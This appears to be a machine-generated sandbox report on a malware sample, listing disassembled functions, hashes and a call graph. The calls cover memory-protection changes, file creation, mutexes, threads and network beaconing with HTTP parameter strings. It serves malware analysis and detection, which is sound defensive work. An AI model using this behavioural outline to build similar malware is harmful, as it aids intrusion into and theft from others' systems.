                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3d28c8324968df941eb3f3e26928f704626882c8b6ca800415a041d26c895047
                                      • Instruction ID: 6815e7af3617f30a552e3b67a2b118382295ec6c9398999085eacfb3c4291cc2
                                      • Opcode Fuzzy Hash: 3d28c8324968df941eb3f3e26928f704626882c8b6ca800415a041d26c895047
                                      • Instruction Fuzzy Hash: BE90022165500802D650725884147074406D7D0701F51C025A1025564DC6168A7967B2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 017E4320 Relevance: .0, Instructions: 4COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 08b26e88162aa8be8abca55ea251c1ebe775f129eb78d5808fb29bd2d3501fe0
                                      • Instruction ID: 535578aa6f99c1a7d36240d4cd1506a527799cdd84a8a92d659ab608db5043f3
                                      • Opcode Fuzzy Hash: 08b26e88162aa8be8abca55ea251c1ebe775f129eb78d5808fb29bd2d3501fe0
                                      • Instruction Fuzzy Hash: 01900231A1510012D650765858046478505E7E0341B51C025A1515568CC9148A695362
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 017D75F0 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                      Download Yara Rule
                                      Strings
                                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 0181453B
                                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 0181466D
                                      • Execute=1, xrefs: 018145F9
                                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 018145E2
                                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 0181460B
                                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01814628
                                      • ExecuteOptions, xrefs: 01814586
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                      • API String ID: 0-484625025
                                      • Opcode ID: 0fc96bcf947057367803e73ba3512e785fb673a74fbf72ee69960b2e65071acb
                                      • Instruction ID: 7cea9ce0264be7f6113b213a91f4432164cde6b25b372906dd2b778c6d3fa9fd
                                      • Opcode Fuzzy Hash: 0fc96bcf947057367803e73ba3512e785fb673a74fbf72ee69960b2e65071acb
                                      • Instruction Fuzzy Hash: 5E51297160021DBAEF25AE99DC99FA9B7B8EF18308F1404D9E605A7181F7709F418F60
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 017A9086 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: $$@
                                      • API String ID: 0-1194432280
                                      • Opcode ID: 677f35043afc142550a6c88f7f5273bfb610fdc12639c31d1a063ab33d10b658
                                      • Instruction ID: c574b39fcb8de2bd573856c55dad47ea08e8da5082bfe0011722d2fe95432f0d
                                      • Opcode Fuzzy Hash: 677f35043afc142550a6c88f7f5273bfb610fdc12639c31d1a063ab33d10b658
                                      • Instruction Fuzzy Hash: 28812C71D002699BDB76CB54CC49BEEB7B4AF48714F0445DAEA19B7280D7709E84CFA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Execution Graph

                                      Execution Coverage:2.3%
                                      Dynamic/Decrypted Code Coverage:0%
                                      Signature Coverage:4.7%
                                      Total number of Nodes:444
                                      Total number of Limit Nodes:16
                                      execution_graph 13839 8898e0a 13840 8897942 13839->13840 13841 8898e45 NtProtectVirtualMemory 13840->13841 13842 8898e70 13841->13842 13942 889114a 13943 8891153 13942->13943 13948 8891174 13942->13948 13944 8893382 ObtainUserAgentString 13943->13944 13946 889116c 13944->13946 13945 88911e7 13947 888c0f2 6 API calls 13946->13947 13947->13948 13948->13945 13950 888c1f2 13948->13950 13951 888c20f 13950->13951 13954 888c2c9 13950->13954 13952 8896f12 7 API calls 13951->13952 13955 888c242 13951->13955 13952->13955 13953 888c289 13953->13954 13956 888c0f2 6 API calls 13953->13956 13954->13948 13955->13953 13957 888d432 NtCreateFile 13955->13957 13956->13954 13957->13953 13886 8899a4d 13887 8899a53 13886->13887 13890 888d782 13887->13890 13889 8899a6b 13892 888d78f 13890->13892 13891 888d7ad 13891->13889 13892->13891 13893 8892662 6 API calls 13892->13893 13893->13891 13735 8897f82 13736 8897fb8 13735->13736 13737 88945b2 socket 13736->13737 13738 8898081 13736->13738 13746 8898022 13736->13746 13737->13738 13739 8898134 13738->13739 13741 8898117 getaddrinfo 13738->13741 13738->13746 13740 8894732 connect 13739->13740 13744 88981b2 13739->13744 13739->13746 13740->13744 13741->13739 13742 88946b2 send 13745 8898729 13742->13745 13743 88987f4 setsockopt recv 13743->13746 13744->13742 13744->13746 13745->13743 13745->13746 13919 888fdd9 13921 888fdf0 13919->13921 13920 888fecd 13921->13920 13922 8893382 ObtainUserAgentString 13921->13922 13922->13920 13484 888c2dd 13485 888c31a 13484->13485 13486 888c3fa 13485->13486 13487 888c328 SleepEx 13485->13487 13491 8896f12 13485->13491 13500 888d432 13485->13500 13510 888c0f2 13485->13510 13487->13485 13487->13487 13494 8896f48 13491->13494 13492 8897134 13492->13485 13493 88970e9 13496 8897125 13493->13496 13528 8896842 13493->13528 13494->13492 13494->13493 13498 8897232 NtCreateFile 13494->13498 13516 8897f82 13494->13516 13536 8896922 13496->13536 13498->13494 13501 888d45b 13500->13501 13508 888d4c9 13500->13508 13502 8897232 NtCreateFile 13501->13502 13501->13508 13503 888d496 13502->13503 13504 888d4c5 13503->13504 13557 888d082 13503->13557 13506 8897232 NtCreateFile 13504->13506 13504->13508 13506->13508 13507 888d4b6 13507->13504 13566 888cf52 13507->13566 13508->13485 13511 888c109 13510->13511 13515 888c1d3 13510->13515 13571 888c012 13511->13571 13513 888c113 13514 8897f82 6 API calls 13513->13514 13513->13515 13514->13515 13515->13485 13517 8897fb8 13516->13517 13519 8898081 13517->13519 13527 8898022 13517->13527 13544 88945b2 13517->13544 13520 8898134 13519->13520 13522 8898117 getaddrinfo 13519->13522 13519->13527 13525 88981b2 13520->13525 13520->13527 13547 8894732 13520->13547 13522->13520 13524 88987f4 setsockopt recv 13524->13527 13525->13527 13550 88946b2 13525->13550 13526 8898729 13526->13524 13526->13527 13527->13494 13529 889686d 13528->13529 13553 8897232 13529->13553 13531 8896906 13531->13493 13532 8896888 13532->13531 13533 8897f82 6 API calls 13532->13533 13534 88968c5 13532->13534 13533->13534 13534->13531 13535 8897232 NtCreateFile 13534->13535 13535->13531 13537 88969c2 13536->13537 13538 8897232 NtCreateFile 13537->13538 13540 88969d6 13538->13540 13539 8896a9f 13539->13492 13540->13539 13541 8896a5d 13540->13541 13543 8897f82 6 API calls 13540->13543 13541->13539 13542 8897232 NtCreateFile 13541->13542 13542->13539 13543->13541 13545 889460a socket 13544->13545 13546 88945ec 13544->13546 13545->13519 13546->13545 13548 8894788 connect 13547->13548 13549 889476a 13547->13549 13548->13525 13549->13548 13551 8894705 send 13550->13551 13552 88946e7 13550->13552 13551->13526 13552->13551 13555 889725c 13553->13555 13556 8897334 13553->13556 13554 8897410 NtCreateFile 13554->13556 13555->13554 13555->13556 13556->13532 13558 888d420 13557->13558 13559 888d0aa 13557->13559 13558->13507 13559->13558 13560 8897232 NtCreateFile 13559->13560 13562 888d1f9 13560->13562 13561 888d3df 13561->13507 13562->13561 13563 8897232 NtCreateFile 13562->13563 13564 888d3c9 13563->13564 13565 8897232 NtCreateFile 13564->13565 13565->13561 13567 888cf70 13566->13567 13568 888cf84 13566->13568 13567->13504 13569 8897232 NtCreateFile 13568->13569 13570 888d046 13569->13570 13570->13504 13573 888c031 13571->13573 13572 888c0cd 13572->13513 13573->13572 13574 8897f82 6 API calls 13573->13574 13574->13572 13767 888fedd 13769 888ff06 13767->13769 13768 888ffa4 13769->13768 13770 888c8f2 NtProtectVirtualMemory 13769->13770 13771 888ff9c 13770->13771 13772 8893382 ObtainUserAgentString 13771->13772 13772->13768 13843 8899a1f 13844 8899a25 13843->13844 13847 888d5f2 13844->13847 13846 8899a3d 13848 888d5fb 13847->13848 13849 888d60e 13847->13849 13848->13849 13851 8892662 13848->13851 13849->13846 13852 889266b 13851->13852 13860 88927ba 13851->13860 13853 888c0f2 6 API calls 13852->13853 13852->13860 13855 88926ee 13853->13855 13854 8892750 13857 889283f 13854->13857 13859 8892791 13854->13859 13854->13860 13855->13854 13856 8897f82 6 API calls 13855->13856 13856->13854 13858 8897f82 6 API calls 13857->13858 13857->13860 13858->13860 13859->13860 13861 8897f82 6 API calls 13859->13861 13860->13849 13861->13860 13727 8898e12 13728 8898e45 NtProtectVirtualMemory 13727->13728 13729 8897942 13727->13729 13730 8898e70 13728->13730 13729->13728 13862 888d613 13863 888d620 13862->13863 13864 888d684 13863->13864 13865 8898e12 NtProtectVirtualMemory 13863->13865 13865->13863 13773 8891cd4 13775 8891cd8 13773->13775 13774 8892022 13775->13774 13779 8891352 13775->13779 13777 8891f0d 13777->13774 13788 8891792 13777->13788 13781 889139e 13779->13781 13780 889158e 13780->13777 13781->13780 13782 88914ec 13781->13782 13784 8891595 13781->13784 13783 8897232 NtCreateFile 13782->13783 13786 88914ff 13783->13786 13784->13780 13785 8897232 NtCreateFile 13784->13785 13785->13780 13786->13780 13787 8897232 NtCreateFile 13786->13787 13787->13780 13789 88917e0 13788->13789 13790 8897232 NtCreateFile 13789->13790 13792 889190c 13790->13792 13791 8891af3 13791->13777 13792->13791 13793 8891352 NtCreateFile 13792->13793 13794 8891602 NtCreateFile 13792->13794 13793->13792 13794->13792 13747 8899aa9 13748 8899aaf 13747->13748 13751 8894212 13748->13751 13750 8899ac7 13752 889421b 13751->13752 13753 8894237 13751->13753 13752->13753 13755 88940c2 13752->13755 13753->13750 13756 88941f0 13755->13756 13757 88940cb 13755->13757 13756->13753 13757->13756 13758 8897f82 6 API calls 13757->13758 13758->13756 13866 889322a 13867 889325e 13866->13867 13868 88928c2 ObtainUserAgentString 13867->13868 13869 889326b 13868->13869 13575 8898bac 13576 8898bb1 13575->13576 13609 8898bb6 13576->13609 13610 888eb72 13576->13610 13578 8898c2c 13579 8898c85 13578->13579 13581 8898c69 13578->13581 13582 8898c54 13578->13582 13578->13609 13580 8896ab2 NtProtectVirtualMemory 13579->13580 13583 8898c8d 13580->13583 13585 8898c6e 13581->13585 13586 8898c80 13581->13586 13584 8896ab2 NtProtectVirtualMemory 13582->13584 13646 8890102 13583->13646 13589 8898c5c 13584->13589 13590 8896ab2 NtProtectVirtualMemory 13585->13590 13586->13579 13587 8898c97 13586->13587 13591 8898c9c 13587->13591 13592 8898cbe 13587->13592 13632 888fee2 13589->13632 13594 8898c76 13590->13594 13614 8896ab2 13591->13614 13596 8898cd9 13592->13596 13597 8898cc7 13592->13597 13592->13609 13638 888ffc2 13594->13638 13601 8896ab2 NtProtectVirtualMemory 13596->13601 13596->13609 13598 8896ab2 NtProtectVirtualMemory 13597->13598 13600 8898ccf 13598->13600 13656 88902f2 13600->13656 13604 8898ce5 13601->13604 13674 8890712 13604->13674 13611 888eb93 13610->13611 13612 888ecb5 CreateMutexW 13611->13612 13613 888ecce 13611->13613 13612->13613 13613->13578 13616 8896adf 13614->13616 13615 8896ebc 13624 888fde2 13615->13624 13616->13615 13686 888c8f2 13616->13686 13618 8896e5c 13619 888c8f2 NtProtectVirtualMemory 13618->13619 13620 8896e7c 13619->13620 13621 888c8f2 NtProtectVirtualMemory 13620->13621 13622 8896e9c 13621->13622 13623 888c8f2 NtProtectVirtualMemory 13622->13623 13623->13615 13625 888fdf0 13624->13625 13627 888fecd 13625->13627 13711 8893382 13625->13711 13628 888c412 13627->13628 13630 888c440 13628->13630 13629 888c473 13629->13609 13630->13629 13631 888c44d CreateThread 13630->13631 13631->13609 13634 888ff06 13632->13634 13633 888ffa4 13633->13609 13634->13633 13635 888c8f2 NtProtectVirtualMemory 13634->13635 13636 888ff9c 13635->13636 13637 8893382 ObtainUserAgentString 13636->13637 13637->13633 13641 8890016 13638->13641 13639 88900f0 13639->13609 13640 88900e8 13642 8893382 ObtainUserAgentString 13640->13642 13641->13639 13643 88900bb 13641->13643 13644 888c8f2 NtProtectVirtualMemory 13641->13644 13642->13639 13643->13640 13645 888c8f2 NtProtectVirtualMemory 13643->13645 13644->13643 13645->13640 13648 8890137 13646->13648 13647 88902d5 13647->13609 13648->13647 13649 888c8f2 NtProtectVirtualMemory 13648->13649 13650 889028a 13649->13650 13651 888c8f2 NtProtectVirtualMemory 13650->13651 13654 88902a9 13651->13654 13652 88902cd 13653 8893382 ObtainUserAgentString 13652->13653 13653->13647 13654->13652 13655 888c8f2 NtProtectVirtualMemory 13654->13655 13655->13652 13659 8890349 13656->13659 13657 88904c3 13664 888c8f2 NtProtectVirtualMemory 13657->13664 13665 8890597 13657->13665 13658 889049f 13658->13657 13660 888c8f2 NtProtectVirtualMemory 13658->13660 13659->13658 13661 888c8f2 NtProtectVirtualMemory 13659->13661 13660->13657 13662 8890480 13661->13662 13663 888c8f2 NtProtectVirtualMemory 13662->13663 13663->13658 13664->13665 13666 888c8f2 NtProtectVirtualMemory 13665->13666 13668 88905bf 13665->13668 13666->13668 13667 88906e1 13669 8893382 ObtainUserAgentString 13667->13669 13670 888c8f2 NtProtectVirtualMemory 13668->13670 13671 88906b9 13668->13671 13672 88906e9 13669->13672 13670->13671 13671->13667 13673 888c8f2 NtProtectVirtualMemory 13671->13673 13672->13609 13673->13667 13675 8890767 13674->13675 13676 888c8f2 NtProtectVirtualMemory 13675->13676 13681 8890903 13675->13681 13677 88908e3 13676->13677 13678 888c8f2 NtProtectVirtualMemory 13677->13678 13678->13681 13679 88909b7 13680 8893382 ObtainUserAgentString 13679->13680 13683 88909bf 13680->13683 13682 8890992 13681->13682 13684 888c8f2 NtProtectVirtualMemory 13681->13684 13682->13679 13685 888c8f2 NtProtectVirtualMemory 13682->13685 13683->13609 13684->13682 13685->13679 13687 888c987 13686->13687 13692 888c9b2 13687->13692 13701 888d622 13687->13701 13689 888cc0c 13689->13618 13690 888cba2 13691 8898e12 NtProtectVirtualMemory 13690->13691 13700 888cb5b 13691->13700 13692->13689 13692->13690 13693 888cac5 13692->13693 13705 8898e12 13693->13705 13695 8898e12 NtProtectVirtualMemory 13695->13689 13696 888cae3 13696->13689 13697 888cb3d 13696->13697 13698 8898e12 NtProtectVirtualMemory 13696->13698 13699 8898e12 NtProtectVirtualMemory 13697->13699 13698->13697 13699->13700 13700->13689 13700->13695 13702 888d67a 13701->13702 13703 888d684 13702->13703 13704 8898e12 NtProtectVirtualMemory 13702->13704 13703->13692 13704->13702 13706 8898e45 NtProtectVirtualMemory 13705->13706 13709 8897942 13705->13709 13708 8898e70 13706->13708 13708->13696 13710 8897967 13709->13710 13710->13706 13712 88933c7 13711->13712 13715 8893232 13712->13715 13714 8893438 13714->13627 13716 889325e 13715->13716 13719 88928c2 13716->13719 13718 889326b 13718->13714 13721 8892934 13719->13721 13720 88929a6 13720->13718 13721->13720 13722 8892995 ObtainUserAgentString 13721->13722 13722->13720 13870 888d42e 13871 888d45b 13870->13871 13879 888d4c9 13870->13879 13872 8897232 NtCreateFile 13871->13872 13871->13879 13873 888d496 13872->13873 13874 888d082 NtCreateFile 13873->13874 13878 888d4c5 13873->13878 13876 888d4b6 13874->13876 13875 8897232 NtCreateFile 13875->13879 13877 888cf52 NtCreateFile 13876->13877 13876->13878 13877->13878 13878->13875 13878->13879 13939 889472e 13940 8894788 connect 13939->13940 13941 889476a 13939->13941 13941->13940 13795 8891ce2 13797 8891dd9 13795->13797 13796 8892022 13797->13796 13798 8891352 NtCreateFile 13797->13798 13799 8891f0d 13798->13799 13799->13796 13800 8891792 NtCreateFile 13799->13800 13800->13799 13801 88942e4 13802 889436f 13801->13802 13803 8894305 13801->13803 13803->13802 13804 88940c2 6 API calls 13803->13804 13804->13802 13958 888eb66 13960 888eb6a 13958->13960 13959 888ecce 13960->13959 13961 888ecb5 CreateMutexW 13960->13961 13961->13959 13759 88940b9 13760 88940ed 13759->13760 13762 88941f0 13759->13762 13761 8897f82 6 API calls 13760->13761 13760->13762 13761->13762 13805 88900fb 13807 8890137 13805->13807 13806 88902d5 13807->13806 13808 888c8f2 NtProtectVirtualMemory 13807->13808 13809 889028a 13808->13809 13810 888c8f2 NtProtectVirtualMemory 13809->13810 13813 88902a9 13810->13813 13811 88902cd 13812 8893382 ObtainUserAgentString 13811->13812 13812->13806 13813->13811 13814 888c8f2 NtProtectVirtualMemory 13813->13814 13814->13811 13880 889683a 13881 8896841 13880->13881 13882 8897f82 6 API calls 13881->13882 13884 88968c5 13882->13884 13883 8896906 13884->13883 13885 8897232 NtCreateFile 13884->13885 13885->13883 13962 8897f7a 13963 8897fb8 13962->13963 13964 88945b2 socket 13963->13964 13965 8898081 13963->13965 13973 8898022 13963->13973 13964->13965 13966 8898134 13965->13966 13968 8898117 getaddrinfo 13965->13968 13965->13973 13967 8894732 connect 13966->13967 13969 88981b2 13966->13969 13966->13973 13967->13969 13968->13966 13970 88946b2 send 13969->13970 13969->13973 13972 8898729 13970->13972 13971 88987f4 setsockopt recv 13971->13973 13972->13971 13972->13973 13763 88928be 13764 88928c3 13763->13764 13765 8892995 ObtainUserAgentString 13764->13765 13766 88929a6 13764->13766 13765->13766 13894 888ffbf 13897 8890016 13894->13897 13895 88900f0 13896 88900e8 13898 8893382 ObtainUserAgentString 13896->13898 13897->13895 13899 88900bb 13897->13899 13900 888c8f2 NtProtectVirtualMemory 13897->13900 13898->13895 13899->13896 13901 888c8f2 NtProtectVirtualMemory 13899->13901 13900->13899 13901->13896 13923 88999f1 13924 88999f7 13923->13924 13927 888e852 13924->13927 13926 8899a0f 13928 888e8e4 13927->13928 13929 888e865 13927->13929 13928->13926 13929->13928 13930 888e887 13929->13930 13933 888e87e 13929->13933 13930->13928 13932 8892662 6 API calls 13930->13932 13931 889436f 13931->13926 13932->13928 13933->13931 13934 88940c2 6 API calls 13933->13934 13934->13931 13815 888c0f1 13816 888c109 13815->13816 13817 888c1d3 13815->13817 13818 888c012 6 API calls 13816->13818 13819 888c113 13818->13819 13819->13817 13820 8897f82 6 API calls 13819->13820 13820->13817 13935 888d5f1 13936 888d60e 13935->13936 13937 888d606 13935->13937 13938 8892662 6 API calls 13937->13938 13938->13936 13902 88999b3 13903 88999bd 13902->13903 13906 888e6d2 13903->13906 13905 88999e0 13907 888e704 13906->13907 13908 888e6f7 13906->13908 13910 888e72d 13907->13910 13912 888e737 13907->13912 13914 888e6ff 13907->13914 13909 888c0f2 6 API calls 13908->13909 13909->13914 13915 88942c2 13910->13915 13913 8897f82 6 API calls 13912->13913 13912->13914 13913->13914 13914->13905 13916 88942cb 13915->13916 13917 88942df 13915->13917 13916->13917 13918 88940c2 6 API calls 13916->13918 13917->13914 13918->13917 13731 8897232 13733 889725c 13731->13733 13734 8897334 13731->13734 13732 8897410 NtCreateFile 13732->13734 13733->13732 13733->13734 13821 88902f4 13822 8890349 13821->13822 13823 889049f 13822->13823 13825 888c8f2 NtProtectVirtualMemory 13822->13825 13824 888c8f2 NtProtectVirtualMemory 13823->13824 13828 88904c3 13823->13828 13824->13828 13826 8890480 13825->13826 13827 888c8f2 NtProtectVirtualMemory 13826->13827 13827->13823 13829 8890597 13828->13829 13830 888c8f2 NtProtectVirtualMemory 13828->13830 13831 888c8f2 NtProtectVirtualMemory 13829->13831 13832 88905bf 13829->13832 13830->13829 13831->13832 13835 888c8f2 NtProtectVirtualMemory 13832->13835 13836 88906b9 13832->13836 13833 88906e1 13834 8893382 ObtainUserAgentString 13833->13834 13837 88906e9 13834->13837 13835->13836 13836->13833 13838 888c8f2 NtProtectVirtualMemory 13836->13838 13838->13833

                                      Executed Functions

                                      Function 08897F82 Relevance: 23.6, APIs: 3, Strings: 10, Instructions: 815networkCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 0 8897f82-8897fb6 1 8897fb8-8897fbc 0->1 2 8897fd6-8897fd9 0->2 1->2 3 8897fbe-8897fc2 1->3 4 8897fdf-8897fed 2->4 5 88988fe-889890c 2->5 3->2 6 8897fc4-8897fc8 3->6 7 8897ff3-8897ff7 4->7 8 88988f6-88988f7 4->8 6->2 9 8897fca-8897fce 6->9 10 8897ff9-8897ffd 7->10 11 8897fff-8898000 7->11 8->5 9->2 13 8897fd0-8897fd4 9->13 10->11 12 889800a-8898010 10->12 11->12 14 889803a-8898060 12->14 15 8898012-8898020 12->15 13->2 13->4 17 8898068-889807c call 88945b2 14->17 18 8898062-8898066 14->18 15->14 16 8898022-8898026 15->16 16->8 19 889802c-8898035 16->19 22 8898081-88980a2 17->22 18->17 20 88980a8-88980ab 18->20 19->8 23 88980b1-88980b8 20->23 24 8898144-8898150 20->24 22->20 25 88988ee-88988ef 22->25 27 88980ba-88980dc call 8897942 23->27 28 88980e2-88980f5 23->28 24->25 26 8898156-8898165 24->26 25->8 29 889817f-889818f 26->29 30 8898167-8898178 call 8894552 26->30 27->28 28->25 32 88980fb-8898101 28->32 35 8898191-88981ad call 8894732 29->35 36 88981e5-889821b 29->36 30->29 32->25 33 8898107-8898109 32->33 33->25 38 889810f-8898111 33->38 47 88981b2-88981da 35->47 41 889822d-8898231 36->41 42 889821d-889822b 36->42 38->25 46 8898117-8898132 getaddrinfo 38->46 44 8898233-8898245 41->44 45 8898247-889824b 41->45 43 889827f-8898280 42->43 51 8898283-88982e0 call 8898d62 call 8895482 call 8894e72 call 8899002 43->51 44->43 48 889824d-889825f 45->48 49 8898261-8898265 45->49 46->24 50 8898134-889813c 46->50 47->36 52 88981dc-88981e1 47->52 48->43 53 889826d-8898279 49->53 54 8898267-889826b 49->54 50->24 63 88982e2-88982e6 51->63 64 88982f4-8898354 call 8898d92 51->64 52->36 53->43 54->51 54->53 63->64 65 88982e8-88982ef call 8895042 63->65 69 889835a-8898396 call 8898d62 call 8899262 call 8899002 64->69 70 889848c-88984b8 call 8898d62 call 8899262 64->70 65->64 85 8898398-88983b7 call 8899262 call 8899002 69->85 86 88983bb-88983e9 call 8899262 * 2 69->86 79 88984d9-8898590 call 8899262 * 3 call 8899002 * 2 call 8895482 70->79 80 88984ba-88984d5 70->80 108 8898595-88985b9 call 8899262 79->108 80->79 85->86 101 88983eb-8898410 call 8899002 call 8899262 86->101 102 8898415-889841d 86->102 101->102 105 889841f-8898425 102->105 106 8898442-8898448 102->106 111 8898467-8898487 call 8899262 105->111 112 8898427-889843d 105->112 107 889844e-8898456 106->107 106->108 107->108 113 889845c-889845d 107->113 121 88985bb-88985cc call 8899262 call 8899002 108->121 122 88985d1-88986ad call 8899262 * 7 call 8899002 call 8898d62 call 8899002 call 8894e72 call 8895042 108->122 111->108 112->108 113->111 132 88986af-88986b3 121->132 122->132 135 88986ff-889872d call 88946b2 132->135 136 88986b5-88986fa call 8894382 call 88947b2 132->136 144 889875d-8898761 135->144 145 889872f-8898735 135->145 152 88988e6-88988e7 136->152 149 889890d-8898913 144->149 150 8898767-889876b 144->150 145->144 148 8898737-889874c 145->148 148->144 153 889874e-8898754 148->153 154 8898779-8898784 149->154 155 8898919-8898920 149->155 156 88988aa-88988df call 88947b2 150->156 157 8898771-8898773 150->157 152->25 153->144 160 8898756 153->160 161 8898786-8898793 154->161 162 8898795-8898796 154->162 155->161 156->152 157->154 157->156 160->144 161->162 164 889879c-88987a0 161->164 162->164 167 88987b1-88987b2 164->167 168 88987a2-88987af 164->168 170 88987b8-88987c4 167->170 168->167 168->170 173 88987f4-8898861 setsockopt recv 170->173 174 88987c6-88987ef call 8898d92 call 8898d62 170->174 177 88988a3-88988a4 173->177 178 8898863 173->178 174->173 177->156 178->177 181 8898865-889886a 178->181 181->177 184 889886c-8898872 181->184 184->177 186 8898874-88988a1 184->186 186->177 186->178
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.2509035504.0000000008850000.00000040.80000000.00040000.00000000.sdmp, Offset: 08850000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_8850000_explorer.jbxd
                                      Similarity
                                      • API ID: getaddrinforecvsetsockopt
                                      • String ID: Co$&br=$&sql$&un=$: cl$GET $dat=$nnec$ose$tion
                                      • API String ID: 1564272048-1117930895
                                      • Opcode ID: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                      • Instruction ID: ec1ebce711df56b22caee28ff812cf885390c2d53841ad84ef169a07515f314e
                                      • Opcode Fuzzy Hash: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                      • Instruction Fuzzy Hash: 0B52A130614A098FCB29EF68C8847E9B7E1FB55301F58466ED4EFD7642DE30A54ACB81
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 08897232 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 642filenativeCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 303 8897232-8897256 304 88978bd-88978cd 303->304 305 889725c-8897260 303->305 305->304 306 8897266-88972a0 305->306 307 88972bf 306->307 308 88972a2-88972a6 306->308 310 88972c6 307->310 308->307 309 88972a8-88972ac 308->309 311 88972ae-88972b2 309->311 312 88972b4-88972b8 309->312 313 88972cb-88972cf 310->313 311->310 312->313 314 88972ba-88972bd 312->314 315 88972f9-889730b 313->315 316 88972d1-88972f7 call 8897942 313->316 314->313 320 8897378 315->320 321 889730d-8897332 315->321 316->315 316->320 324 889737a-88973a0 320->324 322 88973a1-88973a8 321->322 323 8897334-889733b 321->323 327 88973aa-88973d3 call 8897942 322->327 328 88973d5-88973dc 322->328 325 889733d-8897360 call 8897942 323->325 326 8897366-8897370 323->326 325->326 326->320 330 8897372-8897373 326->330 327->320 327->328 332 88973de-889740a call 8897942 328->332 333 8897410-8897458 NtCreateFile call 8897172 328->333 330->320 332->320 332->333 339 889745d-889745f 333->339 339->320 340 8897465-889746d 339->340 340->320 341 8897473-8897476 340->341 342 8897478-8897481 341->342 343 8897486-889748d 341->343 342->324 344 889748f-88974b8 call 8897942 343->344 345 88974c2-88974ec 343->345 344->320 352 88974be-88974bf 344->352 350 88978ae-88978b8 345->350 351 88974f2-88974f5 345->351 350->320 353 88974fb-88974fe 351->353 354 8897604-8897611 351->354 352->345 355 889755e-8897561 353->355 356 8897500-8897507 353->356 354->324 361 8897567-8897572 355->361 362 8897616-8897619 355->362 358 8897509-8897532 call 8897942 356->358 359 8897538-8897559 356->359 358->320 358->359 366 88975e9-88975fa 359->366 367 88975a3-88975a6 361->367 368 8897574-889759d call 8897942 361->368 364 88976b8-88976bb 362->364 365 889761f-8897626 362->365 369 8897739-889773c 364->369 370 88976bd-88976c4 364->370 372 8897628-8897651 call 8897942 365->372 373 8897657-889766b call 8898e92 365->373 366->354 367->320 375 88975ac-88975b6 367->375 368->320 368->367 379 8897742-8897749 369->379 380 88977c4-88977c7 369->380 376 88976f5-8897734 370->376 377 88976c6-88976ef call 8897942 370->377 372->320 372->373 373->320 395 8897671-88976b3 373->395 375->320 383 88975bc-88975e6 375->383 400 8897894-88978a9 376->400 377->350 377->376 387 889774b-8897774 call 8897942 379->387 388 889777a-88977bf 379->388 380->320 384 88977cd-88977d4 380->384 383->366 390 88977fc-8897803 384->390 391 88977d6-88977f6 call 8897942 384->391 387->350 387->388 388->400 398 889782b-8897835 390->398 399 8897805-8897825 call 8897942 390->399 391->390 395->324 398->350 404 8897837-889783e 398->404 399->398 400->324 404->350 408 8897840-8897886 404->408 408->400
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.2509035504.0000000008850000.00000040.80000000.00040000.00000000.sdmp, Offset: 08850000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_8850000_explorer.jbxd
                                      Similarity
                                      • API ID: CreateFile
                                      • String ID: `
                                      • API String ID: 823142352-2679148245
                                      • Opcode ID: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                      • Instruction ID: c54f102c91bfaf9c581e02c4116dfe446cedee36622557e694748ff97e076134
                                      • Opcode Fuzzy Hash: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                      • Instruction Fuzzy Hash: 82227D70A28A099FCB59EF68C4856AEF7E1FB98305F44422EE49ED3650DB30E451CB85
                                      Uniqueness

                                      Uniqueness Score: -1.00%

